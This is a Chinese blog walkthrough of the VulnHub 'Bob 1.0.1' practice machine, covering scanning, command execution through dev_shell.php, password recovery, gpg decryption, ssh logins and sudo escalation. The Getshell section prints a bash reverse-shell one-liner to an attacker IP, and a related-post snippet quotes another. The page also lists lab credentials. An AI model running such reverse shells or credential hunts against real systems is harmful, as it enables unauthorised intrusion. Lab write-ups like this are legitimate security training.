Bob_v1.0.1靶机

于 2024-08-10 15:14:39 发布
阅读量180 收藏 5
点赞数 5
文章标签: 网络安全 学习方法 开源 github ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/141091217
版权

靶机地址:Bob: 1.0.1 ~ VulnHub

将靶机和攻击机kali同时设为桥接模式,然后查看靶机的MAC地址:

一、信息收集

确定目标主机:

arp-scan -l

查看靶机开放的端口:

nmap -A -sS -sV -v -p- 192.168.7.254

浏览器访问80端口,点击Login功能点,发现外部登录功能已被禁用

使用dirb扫描目录

dirb http://192.168.7.254/

拼接/robots.txt

拼接/login.php

拼接/dev_shell.php

右键检测发现了一个用户名Bob,无其它有用信息

拼接/lat_memo.html,发现了它将Windows服务器移到了Linux服务器上

拼接/passwords.html,发现密码写在笔记中(😁记住这里,下面会用到哦)

在没有其它思路的情况下,能力的点也只有dev_shell.php了,上面知道了网站是在Linux服务器上,那就尝试输入Linux命令——id

二、Getshell

设置监听:

bash -c 'exec bash -i &>/dev/tcp/192.168.7.251/5555 <&1'    #设置反弹shell语句

反弹成功:

查看/etc/passwd文件,发现了六个具有/bin/bash的用户:

在家目录的bob目录中,发现了密码文件.old_passwordfile.html

查看.old_passwordfile.html文件,发现了两组用户名和密码

cat .old_passwordfile.html

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

使用ssh连接jc用户,连接成功

ssh jc@192.168.7.254 -p25468

在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件

在Secret/Keep_Out/Not_Porn/No_Lookie_In_Here目录下发现一个笔记notes.sh文件,此时我们就知道bob用户的密码就在这个文件中

查看notes.sh文件,发现内容是输出一些语句,且每行的首字母都是大写,试着将每一行的大写字母都提取出来 HARPOCRATES或许就是login.txt.gpg加密文件的密码

回到login.txt.gpg文件处对其进行解密,密码为b0bcat_:

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

尝试bob用户ssh连接:

ssh bob@192.168.7.254 -p25468

三、权限提升

sudo -l     #查看可提权的命令

提权成功!

查看flag.txt成功!

嗷嗷~嗷嗷~
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 486
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 358
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
Bob_v1.0.1靶机复现
weixin_52956666的博客
08-07 237
发现里面说有一个没有保护的shell,电子邮件中包含该shell。有回显,尝试注入一句话木马,发现有的命令不能够执行。切换到家目录,发现有四个用户,切换到bob用户中。之前扫描端口的时候发现ssh开放端口是25468。靶机IP为192.168.112.169。发现可以执行所有操作,直接sudo su。因为免密操作发现有ssh功能,尝试登陆。发现了一个可执行的notes.sh文件。发现还是得从命令执行的地方找突破口。发现首字母都是大写,可能是藏头诗。发现有一个疑似存放密码的地方。sudo -l查看免密操作。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 2991
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 279
【代码】Bob_v1.0.1靶机渗透测试。
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 249
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnbub系列:Bob_v1.0.1
jq_j37的博客
08-03 316
vulnbub系列:Bob_v1.0.1靶机,打靶文章
VulnHub:Bob 1.0.1靶机实战
Aukum的博客
07-08 789
VulnHub-Bob 1.0.1靶机。通过常规信息收集,借助&符号绕过过滤,通过命令执行进行反弹shell。主要考察的是Linux shell基础和信息收集能力。
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 939
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
TFT35_V1.0.1_中文
05-25
TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_中文TFT35_V1.0.1_...
DSVideo_Go_v1.0.1.apk
08-02
安装AndroidTV版的群晖官方DSVideo之后桌面上不生成图标,这个apk就是一个引导程序,安装这个apk之后,桌面上出现DSVideo的图标,点击后引导启动官方DSVideo。
I2C_Timing_Configuration_V1.0.1.xls
08-24
stm32f0硬件I2C_Timing配置工具,来源ST官网:...
ZXDoc_x64_V1.0.1(20230515).exe.zip
07-12
ZXDoc_x64_V1.0.1(20230515).exe.zip 是一个压缩包文件,根据其命名格式,我们可以推断它包含的是ZXDoc软件的64位版本,版本号为1.0.1,发布日期为2023年5月15日。ZXDoc很可能是一款文档管理或者处理相关的应用程序...
I2C_Timing_Configuration_V1.0.1.zip
07-03
I2C timing configuration tool for STM32F3xx and STM32F0xx microcontrollers,STM32时钟配置工具,适用于STM32F3XX和STM32F0XX系列单片机。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
学习方法】高效学习因素 ② ( 学习动机 | 内在学习动机 | 外在学习动机 | 外在学习动机的调整方向 | 保护学习兴趣 | 高考竞争分析 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
08-06 2605
一、高效学习的其它因素 - 学习动机 1、学习动机 2、内在学习动机 3、外在学习动机 4、外在学习动机的问题所在 5、外在学习动机的调整方向 6、保护学习兴趣 7、高考竞争分析
高效的编程学习方法和技巧
AI逍遥子
08-07 1320
编程已成为当代大学生的必备技能,但面对众多编程语言和学习资源,新生们常常感到迷茫。通过这些优质资源和有效的学习策略,新手可以快速入门并逐步提升编程技能,为未来的职业发展打下坚实的基础。通过项目和练习巩固所学知识,提高解决实际问题的能力。:明确学习目标,制定学习计划,逐步实现。:加入编程社区,积极提问和回答问题,与其他学习者交流,获取更多学习资源和建议。:选择一个自己感兴趣的项目,通过项目开发学习新的技术和工具,提升实战能力。:结合在线课程、教程、书籍和社区资源,多渠道学习,全面提升编程技能。
开源数据采集和跟踪系统:助力营销决策的关键工具
最新发布
weixin_40726747的博客
08-08 1056
在现代营销中,数据是最重要的资产之一。了解用户行为、优化广告效果、提升转化率,这一切都离不开精准的数据分析。为了帮助商家更好地掌握这些数据,市场上出现了许多开源的数据采集和跟踪系统。本文将介绍五种主流的开源系统:Matomo、Open Web Analytics (OWA)、Plausible Analytics、Countly和Snowplow Analytics,探讨它们在营销中的意义,并详细介绍它们的安装和使用方法
hc32f030_ide_rev1.0.1
06-06
### 回答1: hc32f030_ide_rev1.0.1是一款集成开发环境(IDE),用于hc32f030系列单片机的开发。它由华大基础(HDP)公司开发,可用于Windows操作系统。hc32f030_ide_rev1.0.1提供了代码编辑、编译、调试等功能,支持多种编程语言,包括C语言和汇编语言。此外,它还支持多种单片机设备和外部模块、接口的配置,如ADC模块、串行通信模块等。hc32f030_ide_rev1.0.1采用图形化界面,用户可以直观地看到当前工程的结构,方便编写代码和调试程序。此外,hc32f030_ide_rev1.0.1还提供了丰富的API库,包括IO口操作、定时器操作、中断操作等,为用户开发的程序提供了丰富的工具和支持。综上所述,hc32f030_ide_rev1.0.1是一款方便、易用、功能强大的单片机开发工具,极大地提高了用户的开发效率和程序运行的可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值